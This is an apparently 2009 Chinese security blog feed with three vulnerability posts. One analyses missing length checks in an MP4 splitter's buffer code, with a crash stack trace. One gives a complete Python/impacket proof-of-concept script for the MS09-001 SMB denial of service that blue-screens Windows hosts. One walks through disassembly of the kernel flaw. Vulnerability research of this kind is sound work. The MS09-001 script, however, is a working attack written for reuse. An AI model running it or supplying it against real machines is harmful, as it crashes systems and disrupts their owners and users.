.text:1000517B                 jz      vuln_here //跳回去循环到世界尽头吧。
.text:10005181

有兴趣的大家可以试试,呵呵,问题多多啊,MP4解码器挺恐怖。 阅读全文
类别:漏洞分析 查看评论]]> 2009-06-07 18:05 http://hi.baidu.com/vessial/blog/item/f5eeac7ac046bbe52f73b396.html <![CDATA[MP4解码器一堆漏洞]]> 0:023> k
ChildEBP RetAddr 0841fcd0 070c62ea kernel32!RaiseException+0x53 0841fd08 070b78e6 MP4Splitter!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 0841fd1c 070b77cc MP4Splitter!AfxThrowMemoryException+0x1b [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp @ 222] 0841fd2c 0709e37c MP4Splitter!operator new+0x16 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmem.cpp @ 363] 0841fd40 0709e439 MP4Splitter!AP4_DataBuffer::ReallocateBuffer+0x1c [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\ap4\source\core\ap4databuffer.cpp @ 162] 0841fd50 070a23c4 MP4Splitter!AP4_DataBuffer::SetDataSize+0x19 [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\ap4\source\core\ap4databuffer.cpp @ 122] 0841fd68 070a2440 MP4Splitter!AP4_Sample::ReadData+0x44 [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\ap4\source\core\ap4sample.cpp @ 134] 0841fd78 070a6f8b MP4Splitter!AP4_Sample::ReadData+0x10 [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\ap4\source\core\ap4sample.cpp @ 114] 0841fd84 070998d3 MP4Splitter!AP4_Track::ReadSample+0x2b [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\ap4\source\core\ap4track.cpp @ 262] 0841fef8 070b53a9 MP4Splitter!CMP4SplitterFilter::DemuxLoop+0x243 [c:\vessial\mpc-hc\src\filters\parser\mp4splitter\mp4splitter.cpp @ 1039] 0841ffa0 070ad63c MP4Splitter!CBaseSplitterFilter::ThreadProc+0x209 [c:\vessial\mpc-hc\src\filters\parser\basesplitter\basesplitter.cpp @ 912] 0841ffb4 7c80b729 MP4Splitter!CAMThread::InitialThreadProc+0x2c [c:\vessial\mpc-hc\src\filters\baseclasses\wxutil.cpp @ 146]

看看这个函数的实现
AP4_Result AP4_DataBuffer::ReallocateBuffer(AP4_Size size) {

// check that the existing data fits
if (m_DataSize > size) return AP4_FAILURE;

//这里只比较了传进来的长度不能小于多少,但是没有 比较它不能大于多少,一般情况下,这个size都是从媒体文件中读取出来的,而且这个长度一般要小于整个媒体 文件的长度的,但是它没有判断,如果我们人为在媒体文件中构造一个数据结构的长度字段为0xffffffff,直接 后果就是后面的内存分配失败,Crash,当然,这只是一个简单的漏洞,但是这觉得这反应了一个程序员的素养, 而且这一套代码,有好多产商都在用,比如Baofeng啊,Nero之类的,如果这个分离器被注册,windows media player播放诸如mp4或者3Gpp,3gp之类的文件时,也会crash.

// allocate a new buffer

AP4_Byte* new_buffer = DNew AP4_Byte[size]; //分配内存。
//copy the contents of the previous buffer ,is any

if (m_Buffer && m_DataSize)
{ memcpy(new_buffer, m_Buffer, m_DataSize); }
// destroy the previous buffer

delete[] m_Buffer; // use the new buffer
m_Buffer = new_buffer; m_BufferSize = size;
return AP4_SUCCESS; }

再看这里
AP4_Result AP4_DataBuffer::SetBuffer(AP4_Byte* buffer, AP4_Size buffer_size)
{    
        if (m_BufferIsLocal) {
      // destroy the local buffer delete[] m_Buffer;
} // we're now using an external buffer
      m_BufferIsLocal = false;
      m_Buffer = buffer; m_BufferSize = buffer_size;
//对传进来的长度不作任何检测,也怪,一般谁会闲得无聊去改一个mp4媒体 文件里面的数据,人家自然很相信这个长度是有效的,但对于一些XX人而言(比如说我,我会人肉)就很难说了:)
return AP4_SUCCESS; }
今天闲着无聊,人肉了一把代码,发现好多问题,等等上图。 阅读全文
类别:漏洞分析 查看评论]]> 2009-06-07 17:43 http://hi.baidu.com/vessial/blog/item/721fa301a8dc49067aec2c87.html <![CDATA[MS09-001 SMB Dos Poc Exploit]]>
一个包过去立刻蓝屏,不过XP SP2不行,因为XP SP2下面默认不允许空会话访问lsarpc,samr等命名管道。

# MS09-001 SMB Dos Vulnerabilities Poc Exploit
# Author : vessial
# http://hi.baidu.com/vessial
# Todo:
# [+] test vista sp1,system BOSD
# Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
#                 http://www.milw0rm.com/exploits/6463
import impacket
from impacket import smb
from impacket import nmb


remote = smb.SMBPacket('')
r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445)
r._login('','','','WORKGROUP')
tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')


smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0xc807
smb1['Tid']    = tid


ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
ntCreate['Data']       = smb.SMBNtCreateAndX_Data()
ntCreate['Parameters']['FileNameLength'] = 14
ntCreate['Parameters']['AndXOffset'] = 0xdede
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Parameters']['AccessMask'] = 0x2019f
ntCreate['Parameters']['CreateOptions'] = 0x400040
ntCreate['Parameters']['ShareAccess'] = 7
ntCreate['Parameters']['Impersonation'] = 2
ntCreate['Parameters']['Disposition'] = 1

ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
smb1.addCommand(ntCreate)
r.sendSMB(smb1)

recv=r.recvSMB()
if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
    ntCreateResponse = smb.SMBCommand(recv['Data'][0])
    ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
    fid = ntCreateParameters['Fid']

smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0
smb1['Tid']    = tid
data = "A"*72

writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)



smb1.addCommand(writeAndX)

writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
writeAndX['Parameters']['Fid'] = fid
writeAndX['Parameters']['AndXOffset'] = 0xdede
writeAndX['Parameters']['Offset'] = 0
writeAndX['Parameters']['WriteMode'] = 8
writeAndX['Parameters']['Remaining'] = len(data)
writeAndX['Parameters']['_reserved'] = -1
writeAndX['Parameters']['DataLength'] = 0xffff
writeAndX['Parameters']['DataOffset'] = 0xffff
writeAndX['Parameters']['HighOffset'] = 0xcccccccc
writeAndX['Data'] = data
r.sendSMB(smb1) 阅读全文
类别:漏洞分析 查看评论]]> 2009-01-29 20:26 http://hi.baidu.com/vessial/blog/item/c10dd9161b67f04d21a4e920.html <![CDATA[MS09-001中的一个kernel Dos漏洞简单描述]]>
这里是根源性的问题所在,看如下的代码片断

PAGE:F7EA11BB                                         ; SrvSmbWriteAndX(x)+D9B6 j
PAGE:F7EA11BB                 mov     eax, [ebp+var_2C] ; Write_andX packet//这里是WriteAndx的请求包,不包括SMB头部的
PAGE:F7EA11BE                 movzx   edx, word ptr [eax+17h] ; data offset//这个字段是Write AndX的数据偏移字段,这个偏移是SMB头指针到数据段payload之间的长度,这样SMB头加上这个偏移可以直接定位到数据段了,这个字段可以构造,就是因为可以构造这个偏移,所以SMB头加上这个偏移后,指向了一个非引用的内存地址,而这个地址在npfs.sys中进行了读操作,从而导致DOS攻击,蓝屏了。
PAGE:F7EA11C2                 mov     [ebp+var_48], edx
PAGE:F7EA11C5                 mov     esi, [ebx+70h] ; SMB packet header//这里是SMB的头部指针
PAGE:F7EA11C8                 add     esi, edx //SMB头部指针加上这个数据偏移
PAGE:F7EA11CA                 mov     [ebp+var_4C], esi
PAGE:F7EA11CD                 mov     ecx, [ebx+64h]
PAGE:F7EA11D0                 mov     ecx, [ecx+10h] ; SMB packet length
PAGE:F7EA11D3                 sub     ecx, edx
PAGE:F7EA11D5                 movzx   edi, word ptr [eax+15h] ; Data length low
PAGE:F7EA11D9                 cmp     edi, ecx
PAGE:F7EA11DB                 jb      short loc_F7EA11DF
PAGE:F7EA11DD                 mov     edi, ecx
PAGE:F7EA11DF
PAGE:F7EA11DF loc_F7EA11DF:                           ; CODE XREF: SrvSmbWriteAndX(x)+107 j
PAGE:F7EA11DF                 mov     [ebp+var_50], edi
PAGE:F7EA11E2                 movzx   ecx, word ptr [eax+11h] ; Remaining
PAGE:F7EA11E6                 mov     [ebp+var_54], ecx
PAGE:F7EA11E9                 mov     ecx, [ebx+68h] ; SMB packet header
PAGE:F7EA11EC                 movzx   edx, word ptr [ecx+1Ah] ; PID
PAGE:F7EA11F0                 mov     ecx, [ebp+var_34]
PAGE:F7EA11F3                 or      edx, [ecx+44h]
PAGE:F7EA11F6                 mov     [ebp+var_58], edx
PAGE:F7EA11F9                 push    2

阅读全文
类别:漏洞分析 查看评论]]> 2009-01-16 16:21 http://hi.baidu.com/vessial/blog/item/30e0f722df9986a34723e8b6.html